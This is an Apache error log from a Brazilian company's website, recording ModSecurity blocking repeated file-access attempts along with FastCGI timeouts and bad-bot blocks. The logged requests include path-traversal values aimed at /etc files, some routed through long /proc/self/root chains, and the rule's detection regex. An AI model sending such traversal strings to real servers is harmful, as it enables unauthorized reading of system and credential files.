[Tue Mar 17 19:27:09.339193 2026] [:error] [pid 19507:tid 140411725141760] [client 216.73.216.191:2351] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVPdY0UrI5A3LftIwdeAAAAYI"]
[Tue Mar 17 19:27:32.125794 2026] [proxy_fcgi:error] [pid 11088:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55826] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:27:54.076563 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:28:15.133791 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:28:26.822921 2026] [:error] [pid 25836:tid 140411616036608] [client 216.73.216.191:1207] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVioh-PF_25v4hFRCJCwAAAQ8"]
[Tue Mar 17 19:28:37.121216 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57172] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:28:48.672948 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:53836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVoNY0UrI5A3LftIwdvgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:28:59.118315 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57500] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:29:00.192363 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.241.31:58632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVrHIk7brgkOH-rIWrpAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:29:02.933540 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:58332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVrhj0p0SRWAqcjGGYZAAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:29:03.260762 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:58310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVr-yqAr6etmhZHNpGRQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:29:21.138861 2026] [proxy_fcgi:error] [pid 25836:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:29:31.003609 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:44072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVy9a6ubjKNq_cu4YmNwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:29:35.718742 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:58336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnVz9a6ubjKNq_cu4YmOwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:29:45.128374 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:30:08.122026 2026] [proxy_fcgi:error] [pid 2598:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58790] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:30:29.125779 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59208] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:30:52.129824 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59594] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:30:58.015426 2026] [:error] [pid 11088:tid 140411565680384] [client 74.7.243.128:41152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnWIWmqtCojLHvu5cKH7gAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:31:05.076775 2026] [:error] [pid 25836:tid 140411674785536] [client 216.73.216.191:1944] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnWKYh-PF_25v4hFRCJUwAAAQg"]
[Tue Mar 17 19:31:14.780115 2026] [:error] [pid 26799:tid 140411574073088] [client 216.73.216.191:63560] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnWMta6ubjKNq_cu4YmWwAAA1Q"]
[Tue Mar 17 19:31:16.170258 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:31:38.124575 2026] [proxy_fcgi:error] [pid 7004:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60452] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:31:42.416111 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.244.43:57698] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnWTew_le52K8_3pV1shAAAAgc"]
[Tue Mar 17 19:31:42.422819 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.228.61:49532] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnWTuw_le52K8_3pV1shwAAAgE"]
[Tue Mar 17 19:32:00.129832 2026] [proxy_fcgi:error] [pid 29151:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:32:22.145787 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33058] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:32:45.122829 2026] [proxy_fcgi:error] [pid 7004:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33488] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:33:07.125387 2026] [proxy_fcgi:error] [pid 25836:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34068] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:33:29.145824 2026] [proxy_fcgi:error] [pid 29151:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34720] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:33:51.132119 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:34:14.131550 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:34:15.928228 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:53794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnW5-yqAr6etmhZHNpGwgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:34:37.109809 2026] [proxy_fcgi:error] [pid 11088:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36130] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:34:43.141337 2026] [mime_magic:error] [pid 7004:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:3205] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 19:34:43.141618 2026] [access_compat:error] [pid 7004:tid 140411565680384] [client 216.73.216.191:3205] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 19:34:52.993138 2026] [:error] [pid 11816:tid 140411590858496] [client 216.73.216.191:58688] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXDOw_le52K8_3pV1ssQAAAhI"]
[Tue Mar 17 19:35:00.245875 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:35:02.616234 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.243.128:44186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXFnIk7brgkOH-rIWsDgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:35:04.978203 2026] [:error] [pid 25836:tid 140411540502272] [client 216.73.216.191:33969] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXGIh-PF_25v4hFRCJeQAAARg"]
[Tue Mar 17 19:35:06.399925 2026] [:error] [pid 7004:tid 140411607643904] [client 216.73.216.191:26291] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXGsU6Sx0TG1YjmQjOUgAAApA"]
[Tue Mar 17 19:35:22.125787 2026] [proxy_fcgi:error] [pid 11088:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37088] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:35:41.191449 2026] [:error] [pid 7004:tid 140411716749056] [client 216.73.216.191:20769] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXPcU6Sx0TG1YjmQjOWgAAAoM"]
[Tue Mar 17 19:35:44.109808 2026] [proxy_fcgi:error] [pid 11088:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37682] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:35:52.740775 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:34274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXSBj0p0SRWAqcjGGY5gAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:35:53.090756 2026] [:error] [pid 31803:tid 140411557287680] [client 216.73.216.191:51648] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXSeyqAr6etmhZHNpG4AAAAFY"]
[Tue Mar 17 19:36:06.057819 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38204] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:36:07.403930 2026] [:error] [pid 11088:tid 140411741927168] [client 74.7.241.31:39270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnXV2mqtCojLHvu5cKIzQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
